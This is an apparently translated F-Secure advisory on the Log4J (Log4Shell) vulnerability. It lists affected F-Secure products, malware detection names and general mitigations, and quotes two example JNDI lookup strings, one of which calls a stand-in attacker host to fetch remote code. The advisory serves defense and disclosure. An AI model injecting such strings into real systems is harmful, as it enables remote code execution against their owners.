A security flaw in the Log4J library, which was discovered on Friday, December 10th, rocked software manufacturers and service providers around the globe. The weak point in the standardized method for processing log messages in software from Microsoft's Minecraft to e-commerce platforms is already being attacked by attackers.
It is almost impossible to describe the extent of the risk that currently exists in vulnerable applications. If a user-controlled string that targets the vulnerability is logged, the vulnerability can be run remotely. In simple terms, an attacker can use this vulnerability to trick the target system into calling up and executing code from a remote location. In the second step, it is up to the attacker what the malicious code should do.
An "almost perfect storm"
This vulnerability shows how difficult it is to secure enterprise software at multiple levels. Outdated software, including older versions of Java, is forcing many companies to develop their own patches or to prevent them from patching them right away. Another complication arises from the challenge of patching the logging functions of Log4j in real time, especially when the threat of attacks is so high and the logging is so important.
All recommended countermeasures should be implemented “immediately”, writes the Cybersecurity & Infrastructure Security Agency in a blog post.
There is not much that individual users can do other than install updates for various online services as they become available. And that should be done immediately. Firms and businesses will work non-stop to deploy patches while securing their own systems. After that, it will be important to determine if there is an active security incident in progress in the affected systems.
Vulnerabilities almost everywhere
It can be more difficult to find an application that doesn't use the Log4J Library than one that does. This omnipresence means that attackers can search for vulnerabilities almost anywhere.
“Please change the name of your Tesla or iPhone CAN'T in $ {jndi: ldap: // url / a}, unless you want an unexpected event, ”says Erka Koivunen, Chief Information Security Officer at F-Secure, joking.
Use of Log4J's formatting language could trigger malware in vulnerable applications. As we know, the mere mention of a phrase like $ {jndi: ldap: //attacker.com/pwnyourserver} in a Minecraft chat on an unpatched system, for example, can trigger a security storm at Microsoft.
Are F-Secure products affected?
F-Secure has determined that the following products are affected by this vulnerability:
- F-Secure Policy Manager
- F-Secure Policy Manager Proxy
- F-Secure Endpoint Proxy
- F-Secure Elements Connector
Both Windows and Linux versions of these products are affected and should be patched immediately.
How can I patch my F-Secure product?
We have developed a security patch for this vulnerability. The latest news and updates on this vulnerability will be published on our community page on an ongoing basis
What protection does F-Secure offer against this security gap?
F-Secure Endpoint Protection (EPP) is constantly updated with detections for the latest local exploit files, but given the many ways a vulnerability can be exploited, this only covers part of the problem.
EPP detections, as usual, deal with any payload seen in the post-exploitation phase. As of this writing, F-Secure has made the following detections, which cover some serious attack scenarios. These are malicious payloads that we have observed in connection with Log4j exploits.
- TR / Drop.Cobacis.AL
- TR / Rozena.wrdej
- TR / PShell.Agent.SWR
- TR / Coblat.G1
- TR / AD.MeterpreterSC.rywng
Many of these detections have been available in F-Secure EPP for months, which means customers are proactively protected from these payloads.
Other existing detections can also be helpful as there are several ways to take advantage of the exploit. This list of useful detections will be continually updated as the situation evolves. Refer to the general recommendations in the following section for additional workarounds.
What general measures should you take with any software, regardless of the manufacturer?
- Restrict network access or restrict it to trusted sites. If your system cannot connect to the internet to retrieve the malicious code, the attack will fail.
- Check with vendors regularly to see if they have any information about patches and other workarounds for security vulnerabilities.
- F-Secure Elements Vulnerability Management can help identify vulnerable systems.
- F-Secure Elements Endpoint Protection or F-Secure Business Suite products can detect and patch the vulnerable software on the system on which they are installed.
F-Secure also keeps all customers and users permanently up to date.
More at F-Secure.com
Via F-Secure Nobody has a better insight into real cyberattacks than F-Secure. We bridge the gap between detection and response. To do this, we leverage the unmatched threat expertise of hundreds of the best technical advisors in our industry, data from millions of devices using our award-winning software, and ongoing innovations in artificial intelligence. Leading banks, airlines and corporations trust our commitment to fight the world's most dangerous cyber threats. Together with our network of top channel partners and over 200 service providers, it is our mission to provide all of our customers with tailored, enterprise-grade cybersecurity. F-Secure was founded in 1988 and is listed on NASDAQ OMX Helsinki Ltd.